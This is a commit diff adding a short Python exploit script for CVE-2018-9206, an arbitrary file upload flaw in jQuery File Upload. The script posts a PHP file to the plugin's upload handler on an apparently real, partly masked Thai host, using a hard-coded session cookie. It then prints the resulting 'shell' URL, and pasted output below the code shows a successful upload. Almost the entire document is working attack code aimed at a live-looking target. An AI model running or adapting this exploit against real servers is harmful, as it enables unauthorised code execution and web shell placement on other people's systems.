Create jquery-file-upload.py

AnZhiJie · Jan 17, 2020 · 53f5767 · 53f5767
1 parent 81e1d71
commit 53f5767
Showing 1 changed file with 19 additions and 0 deletions.
diff --git a/CVE-2018-9206/jquery-file-upload.py b/CVE-2018-9206/jquery-file-upload.py
@@ -0,0 +1,19 @@
+import requests
+import json
+
+burp0_url = "http://purchasing-oneplus-new.xxx.in.th:80/assets/plugins/jquery-file-upload//server/php/index.php"
+
+burp0_cookies = {"PHPSESSID": "0i5ht16te77l0rvv1o6p1vd49u"}
+
+burp0_headers = {"Content-Type": "multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f", "Accept": "*/*", "Accept-Encoding": "gzip,deflate", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21", "Connection": "Keep-alive"}
+burp0_data = "--a211583f728c46a09ca726497e0a5a9f\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"jqueryfileupload_poc.php\"\r\n\r\n<?php phpinfo();?>\r\n--a211583f728c46a09ca726497e0a5a9f--"
+rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+shell_addr = json.loads(rsp.content)['files'][0]['url']
+
+
+
+print "shell is ==> " + shell_addr
+
+
+shell is ==> http://purchasing-oneplus-xxxx.xxxx.in.th/assets/plugins/jquery-file-upload//server/php/files/jqueryfileupload_poc%20%284%29.php